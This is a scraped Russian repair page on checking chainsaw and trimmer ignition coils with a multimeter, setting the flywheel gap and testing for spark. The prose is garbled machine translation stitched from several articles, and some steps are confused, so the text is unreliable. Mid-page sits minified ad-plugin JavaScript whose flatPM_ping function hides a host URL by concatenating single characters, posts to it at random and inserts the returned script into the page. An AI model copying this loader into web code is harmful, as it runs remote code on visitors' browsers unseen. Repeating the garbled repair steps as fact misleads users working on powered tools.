Как проверить катушку зажигания на триммере мультиметром? — Автосправочник — выбор, ремонт, ответы на вопросы

Как проверить катушку зажигания на триммере мультиметром? — Автосправочник — выбор, ремонт, ответы на вопросы

Как проверить катушку зажигания

Современная электроника во многом изменила мир. Даже такие инструменты, как бензопилы, повлияли на высокие технологии. Сегодняшние пилы легкие и мощные. Электронные системы зажигания являются одним из наиболее значимых факторов этой эволюции. Ниже приведены некоторые интересные материалы о таком важном компоненте бензопилы, как катушка зажигания.

Не так много лет назад системы зажигания, используемые на профессиональных пилах, были кулачковыми. Они были трудными, сложными, дорогими и подвержены всевозможным проблемам. особенно в дождливые дни. Даже когда у пилы была искра, часто было трудно бежать.

Современные системы маленькие, легкие и долговечные. По сравнению с предыдущими системами зажигания они практически безотказны. Современная катушка профессиональна и почти всегда служит пожизненным бензопилам. Хотя изменения в системах зажигания были огромными, иногда могут возникнуть проблемы с эксплуатацией. Зачастую эти проблемы легко решаются самостоятельно и не требуют поездки в дорогую ремонтную мастерскую.

Некоторые ранние электронные системы зажигания состоят из двух частей. модуля запуска и катушки. Сегодня они объединяются в одно целое. На пилах с двумя лезвиями спусковой крючок можно заменить, не меняя катушку. Это простая работа, поскольку спусковой крючок обычно устанавливается с помощью пары винтов.

При замене этой части просто удалите старый модуль и замените старый. Просто убедитесь, что новый модуль имеет хорошую основу. Если вы заметили коррозию на монтажных соединениях или если винты не были затянуты, это может быть вашей проблемой воспламенения. Модули должны быть хорошо соединены.

Замена катушки немного сложнее. Катушка зажигания установлена ​​в корпусе вентилятора рядом с маховиком. Модуль, который контактирует с магнитным полем маховика, генерирует энергию для искры и содержит ссылки на момент зажигания. При замене катушки снимите старую катушку и осмотрите ее.

Даже если вы не видите повреждений, проверьте подшипник коленвала. Если вы чувствуете движение и люфт в этом подшипнике, замените подшипник. Также проверьте маховик. Если все выглядит хорошо, установите новую катушку. Основание катушки должно быть установлено примерно на 1. 1,5 мм выше магнитов маховика.

При замене катушки зазор должен быть идеально расположен таким образом, чтобы маховик не касался катушки, где бы она ни вращалась. Также недопустимо использовать толстый картон и плотную бумагу, зазор должен быть соответствующим, обратить на это особое внимание.

Современные системы зажигания изменились и имеют функции, которые меняют импульс в зависимости от скорости пилы. Эта «кривая» запрограммирована в «чип» и помогает пыли производить больше энергии, поэтому модифицированный импульс дает больше времени для сжигания топлива, тем самым получая больше энергии, запасенной в топливе. В дополнение к большей мощности, некоторые системы зажигания облегчают запуск пил.

Поскольку системы зажигания становятся все более мощными и мощными, сами компоненты становятся меньше и долговечнее. В настоящее время выход из строя катушки зажигания является редкостью.

Системы зажигания прошли долгий путь за последние десять лет, но инженеры говорят, что новые технологии приведут к еще большим улучшениям в ближайшие годы.

Я надеюсь, что эта информация поможет вам диагностировать и устранить проблемы с вашей системой зажигания пыльцы. Если вы не можете устранить неисправность, мы всегда рады видеть вас на нашей мастерской. Мы предлагаем только качественный ремонт бензопил. Телефон нашего семинара 8 (499) 390-93-49

Перед началом работы с катушкой зажигания стоит проверить работоспособность всей цепи. Следуй этим шагам:

  • визуально оценить отсутствие трещин и видимых дефектов на корпусе катушки
  • загрязнение токопроводящих элементов и компонентов
  • работоспособность и изоляция высоковольтных проводов, проводных контактов, надежность их крепления, отсутствие ржавчины в местах крепления
  • проверьте состояние крышки свечи: она часто отсоединяется от высоковольтного провода и пытается починить ее «ненадлежащими» методами. Помните: любая «насадка» в этом месте снижает качество электрической дуги свечи
  • проверить состояние свечи. Качество нашего бензина не позволяет свече «долго жить»,
  • проверьте работу выключателя. Это особенно важно для китайских пил и триммеров.

Смысл этих действий состоит в том, чтобы исключить из списка возможных сбоев все элементы схемы, кроме катушки. Если все хорошо, мы идем дальше.

В большинстве современных моделей бензопилы и триммеры не требуют выбора момента зажигания. Этот угол определяется положением специальной канавки на маховике для шпоночного паза с коленчатым валом и магнитами, установленными на одном маховике.

Все, что вам нужно сделать, это правильно отрегулировать зазор между маховиком и катушкой зажигания. Зазор может варьироваться в зависимости от модели инструмента. Обычно это 0,2-0,4 мм. Поскольку маховик закруглен, обычный автомобильный датчик не будет работать для этой цели. Технически было бы целесообразно открыть разрыв с помощью специального шаблона.

Но это не всегда можно купить. Покупать такой дорогой одноразовый шаблон неразумно. Вместо корпоративного шаблона вы можете использовать полоску из пластиковых бутылок с водой. Разрежьте полоску бутылки в месте, где нет тиснения. Тогда шаги зазора примерно одинаковы для бензопил и триммеров:

  1. Снять болты зажигания.
  2. Поместите магниты на маховик к катушке зажигания
  3. Затяните маховик между маховиком и катушкой и затяните крепежные болты.
  4. Удалить полосу
  5. Поверните маховик на 360 градусов несколько раз, убедившись, что он не цепляется за катушку.

Все. Зазор между катушкой и маховиком установлен.

Ремонт катушки зажигания невозможен и нецелесообразен. Ниже приведен список катушек зажигания, доступных на нашем сайте.

Эта секция бензопил включает в себя ряд взаимосвязанных частей, которые вызывают искрение при запуске двигателя. Их основное назначение. поджечь горючую смесь, чтобы двигатель мог перейти в рабочий режим.

Несмотря на тщательность этой части современных бензопил, она также периодически требует не только ремонта, но и правильной регулировки. А что нужно знать, и о чем пойдет речь в этой статье.

Кроме того, форма режущего зуба и шаг цепи вносят значительный вклад в производительность.

Но нет никаких сомнений в том, что, сообщая нам о таких показателях, производитель тем самым берет на себя ответственность за уровень эксплуатации оборудования. И, зная скорость резки, вы можете надеяться, что ваша бензопила способна сделать это, не ставя под угрозу ее целостность.

Установка воздушного фильтра

Смысл использования воздушного фильтра в бензопилах заключается в том, что он предотвращает попадание пыли, опилок и других мелких частиц в двигатель и шасси.

Система защиты в этом случае состоит из двух частей: крыльчатка, установленная на валу двигателя, станет первым барьером, а воздушный фильтр, капрон или сам фетр. следующим. Этот элемент хранит большую часть грязи и легко моется или заменяется во время обслуживания

Его также можно пропитать специальными маслами, которые увеличивают коэффициент захвата частиц и предотвращают их «цементирование».Тормозной тормоз

Эта функция является неотложной необходимостью, основанной на особенностях работы с бензопилой: непоправимый ущерб может быть вызван «люфтом» или случайным разрывом цепи оператора.

Следовательно, лучшим решением в этом случае является замыкание цепи. Это через механизм, который включает щит бензопилы.

Если пильный рычаг опирается на него, усилие передается на тормоз через рычаг, и цепь блокируется. Это может произойти автоматически.

Сейчас читают:  Триммеры бензиновые недорогие - Полоцк - купить в интернет-магазине, цены

Стандартная система зажигания карбюраторного двигателя состоит из:

  • магнит;
  • свеча зажигания;
  • электрический кабель, соединяющий их друг с другом;
  • ключи выключения двигателя.

Схема зажигания бензопилой Урал

Магнит. это тип генератора, который подает электричество на свечу зажигания. Он состоит из неподвижной обмотки индуктора и постоянного магнита, установленного на маховике, который вращается коленчатым валом бензинового двигателя. Движущееся магнитное поле создает электродвижущую силу в обмотке низкого напряжения, которая превращает трансформатор в напряжение с потенциалом, достаточным для создания искры.

Для контактных магнитов первый выход высоковольтной обмотки подключен к свече зажигания, а второй через механический переключатель на землю. В какой-то момент специальный конструктивный элемент устанавливает контакты, что приводит к резкому увеличению напряжения в сети и прохождению искр в электродном пространстве свечи.

Цепь зажигания бензопилы с бесконтактным магнитом основана на работе управляющей катушки, которая играет роль регулятора напряжения. Электронный блок также включает в себя диод, конденсатор и тиристор, который передает ток напряжению некоторого значения.

При открытии конденсатор быстро разряжается, генерируя ток в катушках первичной обмотки, который индуцируется в высокое напряжение, которое ломает свечу зажигания в цилиндре. Электрическая сеть работает в импульсном режиме до удара, когда коленчатый вал вращается и поступательное движение цилиндров.

  1. Сначала настройте мультиметр так, чтобы стрелка устройства составляла примерно 200 Ом;
  2. После этого откройте руководство по бензопиле и проверьте оптимальное сопротивление, указанное там для первичной обмотки катушки зажигания. Как правило, эта цифра колеблется от 3 до 5 Ом;
  3. Далее подключите первичную катушку зажигания к устройству. Если производительность этой части катушки нормальная, мы начинаем проверять ее вторичную обмотку;
  4. Опять же, мы изучаем инструкцию по эксплуатации и рассматриваем оптимальные значения сопротивления, указанные для вторичной обмотки. Следует отметить, что эта часть элемента имеет отличные характеристики, поэтому мультиметр должен быть установлен таким образом, чтобы его стрелка находилась рядом с индикатором 20К;
  5. Далее подключите устройство к отверстию катушки, в которое вставляются провода. Если мультиметр показывает нормальные значения, катушка работает полностью. Однако, если импеданс на дисплее устройства далек от параметров, указанных производителем, катушку придется заменить.
  • снимите крышку со свечи и вставьте в нее гвоздь. Будьте осторожны, чтобы не повредить внутреннюю часть крышки. Затем он зажег свечу и управлял ею. Шапку в ноготь лучше откусить. В противном случае это может быть трудно получить.
  • нанесите гвоздь на 6-7 мм от цилиндра.
  • «Запустите» двигатель, то есть выполните обычные шаги на заводе. Это заставит систему зажигания работать. Обратите внимание, что свеча должна быть ввернута в отверстие свечи.
  • Ищите наличие и цвет искры. В идеале искра должна быть «сильной» и ярко-синей. Все остальное является неисправностью.
  • Важные моменты:

Как проверить катушку зажигания на триммере мультиметром

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}

Принцип работы катушки зажигания

Катушку зажигания на простом языке можно назвать обычным повышающим напряжение трансформатором. Её задача преобразовать низковольтное напряжение (6-15В) в высокое (20-30кВ). Она, как и трансформатор, состоит из двух обмоток — первичной и вторичной. Первичная низковольтная катушка состоит из небольшого количества витков, а вторичная из большего.

Но есть ещё один нюанс. Витки в катушке расположены определённым образом, что позволяет катушке, кроме индуктивности, иметь ещё и ёмкость. То есть, своего рода — колебательный контур.

При подаче тока в первичную обмотку в катушке генерируется магнитное поле. Наведенное напряжение генерируется в катушке путем самоиндукции. В момент воспламенения ток в катушке прерывается выходным каскадом (в старых системах — контактами прерывателя).

В свече зажигания происходит высоковольтный разряд с ионизацией искрового промежутка и прохождением тока. Это продолжается, пока накопленная энергия не будет истрачена.

Эти все физические явления, наверное, мало кому интересны, поэтому давайте отвлечёмся и посчитаем, на мой взгляд, интересные факты. Сколько раз свеча зажигания «производит» искру за свой срок службы?

Количество искрообразований  = «об/мин» умножить на «количество цилиндров» и всё это разделить на 2. Возьмём обычный 4-цилиндровый 4-тактный двигатель. Допустим, обороты двигателя составляют 3000 об/мин. Значит количество искрообразований = 3000 х 4/2 = 6000 искр / мин!

Свечи я меняю раз в 30000 км.

Если пройденное расстояние составляет 30 000 км со средней частотой вращения коленчатого вала двигателя 3000 об/мин при средней скорости 60 км/ч, то количество искрообразований составляет 45 000 000 на каждую свечу зажигания! Во как трудится катушка зажигания! Как Золушка, прям

Поэтому катушка зажигания вполне заслуженно может когда-нибудь устать и молча выйти из строя.

Катушку зажигания можно проверить несколькими способами:

  • заменой на заведомо исправную — это самый точный метод проверки
  • осциллографом мотор-тестера
  • омметром
  • «на искру»

Допустим, мы обычные автолюбители и у нас нет в запасе рабочих катушек и, уж тем более, мотор-тестера. Остаётся два последних варианта.

Но вариант «на искру» также требует некоторого оборудования, а именно — высоковольтного разрядника

Банальным выкручиванием свечи и проверкой искры абсолютно ничего не выяснишь. Искра будет и при исправной катушке и при уставшей. А вот при установке свечи обратно в цилиндр во втором случае искры уже не будет. Почему?

Потому что на напряжение пробоя влияет несколько факторов и самый главный из них — давление! Чем выше давление, тем больше требуется напряжение пробоя на одном и том же искровом промежутке.

А разрядник даёт возможность изменять расстояние между своими электродами в широких пределах. Это позволяет выставить зазор для проверки в несколько миллиметров. Но эти несколько миллиметров требуют такого же напряжения пробоя, как и 1мм на свече, ввернутой в цилиндр при работающем двигателе.

Проблемы с воспалением

Система зажигания бензопилой. это целый набор элементов, которые загораются при запуске двигателя. Это необходимо для того, чтобы зажечь топливо и в течение длительного времени приводить двигатель в полную работу.

Сейчас читают:  Триммеры и косы: купить триммер и косу недорого, цены в интернет-магазине Эльдорадо в Москве

Основным элементом системы зажигания является свеча зажигания, которая должна гореть каждый раз, когда двигатель работает в нужном цикле.

Хотя система надежна и хорошо продумана, иногда ее нужно ремонтировать, поэтому пользователю необходимо знать, как изготовлена ​​его бензопила и что он может сделать для ремонта своей системы зажигания.

Бензопила не такое сложное устройство. Однако, если обнаружена неисправность, вы должны обладать хотя бы базовыми знаниями для выявления и исправления возникшего дефекта. Давайте рассмотрим основные неисправности бензопил, выясним, с чем они связаны, и давайте проанализируем основные этапы неисправности.

Самое главное, прежде чем приступить к ремонту, это правильное определение неисправности. И причин инвалидности каждого элемента может быть несколько. Поэтому, прежде чем вы начнете разбирать бензопилу, вы должны попытаться определить, что это за сбой.

Как правило, неисправность бензопилы вызвана неисправностью двигателя или возникновением поломок в других узлах.

Поломки двигателя включают в себя:

  • сбой зажигания;
  • неисправности в системе подачи топлива;
  • неисправность поршня или цилиндра.

В других агрегатах неисправности чаще всего возникают из-за неисправностей тормозного механизма, систем смазки, работы сцепления, шин и т. Д.

Давайте рассмотрим обе группы неисправностей, чтобы вы могли самостоятельно определить причину неисправности, не обращаясь в ремонтную мастерскую.

Наиболее уязвимым элементом карбюраторного двигателя является свеча зажигания. Это также позволяет нам судить о вероятной причине выхода из строя отдельных узлов бензинового двигателя. Рекомендуется следующая процедура.

    Выньте свечу и осмотрите ее. Сухую свечу со светло-коричневым оттенком электродов можно считать хорошей.

Сажа на свече зажигания

Катушка зажигания бензопилой

При установке нового электрического модуля на магнитный двигатель следует отрегулировать зазор. Оптимальное расстояние между маховиком и катушкой зажигания для большинства бензопил составляет 0,2-0,4 мм.

Зазор между магнитом и маховиком

При таком небольшом зазоре невозможно использовать доступный измерительный инструмент для прямого измерения. На практике шаблон пилы Husqvarna используется в виде прокладки, вырезанной из тонкого и гибкого листового материала необходимой толщины. При установке он зажимается в пространстве между маховиком и катушкой, а затем вынимается.

Чтобы избежать регулировки зажигания, используйте инструмент осторожно, избегая ударов. Это особенно верно для бензопил с электронными цепями в системе зажигания, поскольку они очень чувствительны к механическим повреждениям.

  • Двигатель не заводится;
  • Начинается, но сбивается;
  • неустойчивы;
  • не развивает мощность, т.е. нормально работает на холостом ходу, но останавливается под нагрузкой.

При ремонте бензопилы в домашних условиях нужно действовать, отключив ее. По одной проверке наш клиент оставляет возможные причины неисправности, начиная с разработки тех, которые требуют меньше времени для проверки и исправления (см. здесь устройство, которое не работает с двухтактным двигателем).

Система зажигания. Почти все перечисленные выше неисправности двигателя могут быть вызваны неисправностью системы зажигания. Поэтому, когда они происходят, имеет смысл начать устранение неисправностей свечи. Это тем более оправдано, поскольку состояние последнего может предоставить полезную информацию о работе топливной системы. Итак, если есть проблема, вам нужно выключить свечу и осмотреть ее.

Провод отсоединяется и свеча прикручивается специальным ключом.

Если свеча сухая, это означает, что проблема скорее всего не в системе зажигания, а в топливной смеси, которая не попадает в цилиндр. Вы можете завернуть свечу и запустить топливную систему. Если свеча сильно опрыскивается топливной смесью, то ее избыток. Это может быть связано с неправильной регистрацией карбюратора или нарушением правил запуска.

Наличие большого количества черной сажи также указывает на неисправность в топливной системе.

Соотношение масла к бензину в смеси может быть нарушено, карбюратор не отрегулирован или используется масло низкого качества. Свечу промывают бензином, чистят иглой или шилом от отложений углерода, электроды очищают мелкой наждачной бумагой и ставят на место.

Во всех этих случаях будет лишним проверить зазор между электродами свечи зажигания. В зависимости от марки оно должно быть в пределах 0,5-0,65 мм. Убедитесь, что свеча зажигания герметична. Если он изношен или поврежден, утечка из камеры сгорания может не быть обеспечена, что приведет к снижению компрессии цилиндра и проблемам с двигателем.

Даже если свеча проверена, есть веская причина полагать, что это неисправность в топливной системе, вам необходимо проверить свечу зажигания. Модуль зажигания посторонней бензопилой необходимо проверить зазор между катушкой. По крайней мере, чтобы быть уверенным, что все в порядке. Как проверить катушку зажигания бензопилы, модуль husqvarna. Для этого:

  • поставить свечу зажигания;
  • с помощью плоскогубцев с изолированными ручками нанесите резьбу или гайку на цилиндр;
  • потяните ручку стартера и посмотрите. есть искра или нет.

Система зажигания бензопилой. устройство, проверка и регулировка

Технические параметры напрямую связаны с конструкцией инструмента и принципом его работы. Например, мощность, допустимый размер набора пыльцы зависит от объема и типа двигателя. Из конструкции и используемых материалов. вес.

Как правило, конструкция бензопилы представляет собой двигатель, механизмы передачи крутящего момента и пыли. Подсоедините коробку передач (трансмиссию) и систему сцепления между двигателем и цепью. Пильный диск представляет собой шину с прикрепленной к ней цепью. Поскольку двигатель бензопилы двухтактный, он имеет 2 бака. масло (для смазки цепи) и топливо (для топливной смеси).

Это использует топливную смесь, а не бензин, благодаря структуре двухтактного двигателя, у которого нет отдельного резервуара для смазки его внутренних элементов.

Работа инструмента заключается в следующем: когда пользователь тянет «нитку» стартера, коленчатый вал вращается. В этом случае, если в баке имеется достаточное количество топливной смеси, свеча зажигания зажигается на одном из оборотов. искра зажигает смесь.

При сгорании выделяет газы, которые увеличиваются в объеме и толкают поршень. Этот элемент соединен через шатун с коленчатым валом, который по инерции переходит во второй оборот, тем самым продолжая процесс снова без участия внешних сил. Когда пила запускается, двигатель начинает вращать ведущую звездочку.

В свою очередь, к нему прикрепляется пылевой лист, и цепь, удерживаемая звездочкой, начинает «ходить» в канавки шины. Цепь смазывается автоматически во время движения. в конце работы, выключая бензопилу, можно заметить, что из нее вытекает определенное количество масла.

Это неизрасходованное масло осталось в канавках. Характеристики

Размер и мощность двигателя напрямую влияют на мощность самой пилы: чем она больше, тем больше энергии выделяется при движении поршня. Объем также указывает, сколько топлива производит пила с течением времени. Следует иметь в виду, что если размер двигателя не соответствует мощности пилы, он сокращает срок ее службы из-за неэффективного использования.

Объем топливного бака составляет от 0,3 до 1 л. Соответственно масляный бак в 1,5-2 раза меньше. Эта разница в объеме помогает использовать топливную смесь и масло практически с одинаковой скоростью (примерно 30-50 минут) при полной загрузке инструмента.

На бытовых пилах мощность двигателя достигает 40 кубометров. Смотри что 1,5-2 часа без дозаправки. Полупрофессиональные пилы, способные работать в течение 8 часов, имеют мощность двигателя до 60 куб. Видите, и профессиональные пилы. до 121 куб. Модели большого объема дополнительно оснащены инструментами запуска.

Сейчас читают:  Триммер xPower, реальные отзывы покупателей, состав, как использовать, цена, купить на сайте, инструкция, официальный сайт, заказать

Чем больше мощность двигателя, тем мощнее пила и, следовательно, она более продуктивна. Скорость и интенсивность резки зависят от мощности. Эта цифра измеряется в «лошадиных силах» или в кВт (1 л.с. = 0,735 кВт). В зависимости от мощности пилы делятся на классы и области применения. До 2 кВт. бытовые От 0,74 до 2,94 кВт. полупрофессиональные

От 2,94 до 5,15-6 кВт. профессионально

Мощные бензопилы требуют дополнительных физических усилий при работе и знают, как их безопасно использовать, так как с этим инструментом трудно работать. Мощность оборудования может быть снижена за счет естественного износа деталей, использования плохой топливной смеси и неправильно выбранного набора пил.Вес

Номинальная масса пилы. это сумма массы двигателя и кузова с ручками. Зная вес, вы также можете получить представление о функциональном оборудовании: бытовые пилы весят в среднем от 2 до 5 кг.

Они не требуют много энергии, а основным требованием к ним является удобство и простота выполнения периодических небольших работ (заготовка леса, обрезка веток). Полупрофессиональные пилы весят чуть больше. 5-7 кг, что свидетельствует о более высокой мощности и, соответственно, расширении фронта работы.

Поскольку этот тип пилы часто используется в качестве разделителя, в конструкции предусмотрены легкие шины.

На самом деле мастер при использовании бензопилы ощущает нагрузку не только этих элементов, но и веса пильной гарнитуры, полностью заполненных баками для топлива и масла. Следовательно, если важным критерием является легкий вес, следует отдавать предпочтение бытовым и одноручным пилам. они проще, чем другие.

Эта опция становится решающей при выборе инструмента для кроны. обрезки верхних ветвей и всей кроны дерева. Тяжелая бензопила в этом случае не только неэффективна, но и опасна. низкая маневренность, а масса и вибрация мощного двигателя быстро приведут к усталости мастера, его сложно удержать на весу и сделать абсолютно невозможно это с одной стороны.

Поэтому для этого вида работ и рекомендую специализированный, легкий инструмент.

Следует также отметить, что людям, которым противопоказаны интенсивные физические нагрузки, не рекомендуется использовать бензопилы весом более 5 кг.

Работа с профессиональным инструментом требует хорошей физической подготовки, поскольку такие пилы не предусматривают соображений безопасности для крепления ремней из-за высокого риска непредвиденных осложнений на работе (например, падение дерева). Оператор должен быть в состоянии выпустить инструмент и не быть выпущенным.

https://www.youtube.com/watch?v=Lko-HnKOFJM

Акцент на зацепление облегчает управление профессиональными пилами. Он расположен на корпусе рядом с пилой, поэтому, когда этот элемент опирается на ствол дерева, его легче держать. он больше не весит.

Шина является одной из основных частей пыльцевой машины. Это опора цепи и канал для ее смазки (путем перемещения валов цепи в пазы во время работы).

Важной особенностью шины является ее длина. Он определяет максимальную толщину ствола, которую может видеть инструмент. Чем длиннее шина, тем больше глубина резания.

Это заставляет весь набор пыли намного быстрее изнашиваться, и расход топлива увеличивается. Бензопилы с короткими и стандартными (30-40 см) шинами быстрее встречаются в домашнем классе, а для профессионалов возможны длины от 45 см до 1 метра.

Следует также иметь в виду, что с увеличением длины шины сила отдачи увеличивается с увеличением сопротивления материала.

Шаг цепи

Пильная цепь является частью пыльцевой машины. Состоит из заклепочных звеньев (зубьев). Его параметрами являются шаг цепи, высота профиля, толщина ведущего звена и глубина резания. Основным шагом среди них является шаг цепи. расстояние между тремя последовательными заклепками на цепи, деленное на 2.

Цепи делятся на пять групп, в зависимости от размера шага: 6,35 мм.

Редко используются миниатюрные цепочки. Они устанавливаются на одноручные маломощные пилы.0,35 дюйма (8,25 мм) и 38 дюймов (9,3 мм)

На этом этапе низкопрофильные схемы пересекаются. Более 80% продукции пыльцы во всем мире оснащены подобными цепями. Они также наиболее безопасны для неопытных пользователей из-за низкой вероятности люфта и низких вибраций во время работы. 10,26 мм и 19 дюймов (19,05 мм)

